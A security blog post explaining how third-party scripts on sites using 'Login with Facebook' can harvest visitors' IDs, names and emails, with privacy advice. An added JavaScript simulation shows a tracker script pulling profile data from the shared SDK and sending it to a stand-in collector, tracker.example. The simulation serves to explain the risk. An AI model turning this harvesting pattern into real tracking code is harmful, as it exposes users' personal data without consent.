Logon Using Facebook ID? Understand the Devil’s Bargain You Made
Security. Convenience. Pick one! That is my forever mantra.
Now we are finding out that when you log in to your favorite site using "Login with Facebook", your data can be exposed to third parties. Nice.
According to research from "Freedom to Tinker" at Princeton, when a user logs in to a site with Facebook Login, third-party JavaScript embedded in that site (advertising and tracking scripts, not just the site's own code) can use Facebook's API to grab your Facebook user ID and, with it, your profile data, your email address and maybe more.
Facebook, currently in a world of hurt (worldwide) over the Cambridge Analytica mess, is magically very sensitive to people other than Facebook itself stealing your data.
As of right now, they have suspended the ability to link user IDs to Facebook profile pages and are looking at what else they are willing to do to contain the damage without damaging their business model, which depends on letting everyone capture and sell your data.
If all of a sudden web site operators and advertisers can no longer scrape your data, ad revenue may be flushed down the toilet.
Information for this post came from CNBC.
So, given the above, what should you do?
First I want to make one thing clear. Facebook is only one culprit in this game and while it is fun beating Facebook up, we should not lose track of the bigger picture.
Anytime you log in to website "B" using your account at website "A" (such as using your Facebook ID to log into BandsInTown), you run the risk of exposing yourself.
While right now we are only talking about your profile and email being exposed, the developer API documentation on Facebook’s web site says:
To ask for any other permission, your app will need to be reviewed by Facebook before these permissions become visible in the Login Dialog to the public who are logging into your app with Facebook.
I gather this means that other apps may have more of your information than we are talking about in this situation, depending on how well the app developer has conned Facebook (think Cambridge Analytica) or even how much they paid Facebook.
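To make the mechanism concrete, here is an added example (not code from the post, from the Princeton researchers or from Facebook): a self-contained simulation of what happens in the page. Every script loaded into a browser document shares one global object, so a tracker the site embeds reaches the same FB SDK object the site initialised and can ask it who the visitor is. The `FB` object below is a stand-in with constructed session and profile data; only the call shapes (`FB.getLoginStatus` and `FB.api('/me', {fields}, callback)`) mirror the real SDK, and the mapping from granted scopes to profile fields is an assumption made for the simulation.

```javascript
// Added example: simulates how a Facebook-style login SDK exposes the
// logged-in user's identity to EVERY script in the page, first-party or not.
// `FB` is a stand-in with constructed data, not the real SDK. Its callbacks
// fire synchronously here; the real SDK is asynchronous.

// Build a "tab": one shared global namespace plus a log of outbound requests.
function makePage(grantedScopes) {
  const page = { globals: {}, requests: [] };

  // Constructed session and profile for a visitor who is logged in to Facebook.
  const session = { status: 'connected', userID: '10001', accessToken: 'EAAB-constructed' };
  const profile = { id: '10001', name: 'Jane Example', email: 'jane@example.com' };

  // Assumed mapping for the simulation: which profile fields each scope unlocks.
  const fieldsByScope = { public_profile: ['id', 'name'], email: ['email'] };
  const allowed = new Set(grantedScopes.flatMap((s) => fieldsByScope[s] || []));

  // The SDK the site loads and initialises; in a browser this is window.FB.
  page.globals.FB = {
    getLoginStatus(cb) {
      cb({
        status: session.status,
        authResponse: { userID: session.userID, accessToken: session.accessToken },
      });
    },
    api(path, opts, cb) {
      if (path !== '/me') return cb({ error: 'unsupported in stand-in' });
      const out = {};
      for (const f of (opts.fields || 'id').split(',')) {
        if (allowed.has(f) && f in profile) out[f] = profile[f];
      }
      cb(out);
    },
  };
  return page;
}

// First-party code: the site legitimately uses the SDK to finish login.
function siteLoginHandler(page) {
  let uid = null;
  page.globals.FB.getLoginStatus((resp) => {
    if (resp.status === 'connected') uid = resp.authResponse.userID;
  });
  return uid;
}

// Third-party tracker: pulled in by something like
// <script src="https://tracker.example/t.js"> (hypothetical URL). The user
// never authorised it, but it runs in the same global scope, so it sees the
// same `FB`, harvests the identity and ships it to its own server.
function trackerScript(page) {
  const FB = page.globals.FB; // nothing in the browser blocks this lookup
  if (!FB) return null;
  let harvested = null;
  FB.getLoginStatus((resp) => {
    if (resp.status !== 'connected') return;
    FB.api('/me', { fields: 'id,name,email' }, (me) => {
      harvested = { userID: resp.authResponse.userID, ...me };
      page.requests.push({ url: 'https://tracker.example/collect', body: harvested });
    });
  });
  return harvested;
}

// Run the page with a given set of scopes the site requested at login time.
function demo(grantedScopes) {
  const page = makePage(grantedScopes);
  const uid = siteLoginHandler(page);
  const leaked = trackerScript(page);
  return { uid, leaked, exfiltrated: page.requests.length };
}
```

Running `demo(['public_profile', 'email'])` shows the tracker walking away with the user ID, name and email, while `demo(['public_profile'])` shows that the email never leaves the SDK when the site did not ask for that scope. The practical point for site operators is that the permissions requested at login set the ceiling on what any script on the page, yours or a tracker's, can pull, and that the only real boundary is which scripts you allow into the page at all.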
Also, the site you log in to with your Facebook ID never sees your Facebook password; what it gets is an access token scoped to the permissions you granted. If that site is compromised, the token and everything it can reach are exposed, and if your Facebook account itself is compromised, every other site you log in to with your Facebook ID is exposed along with it.
The best solution is to log in to each site with its own user ID and password.
Use a password manager to track these for you. Most password managers will generate random passwords for you and, since they fill them into the login page automatically, you don't have to remember them. Win-win: better passwords and less work for you.
If you are not willing to do this, then at least only use shared login for accounts that you don't care about, what I call throw-away accounts. Don't do it for any account that has access to your credit card information (any e-commerce site) or bank account information.
Ultimately, the choice is yours. Security or convenience, pick one.
And Facebook is only one site that offers this shared login. The problem is the same with all of them. The list of OAuth providers (OAuth being the protocol most of these shared logins are built on) is long, including Google, Etsy, Flickr, Instagram and many more; see a list of them here.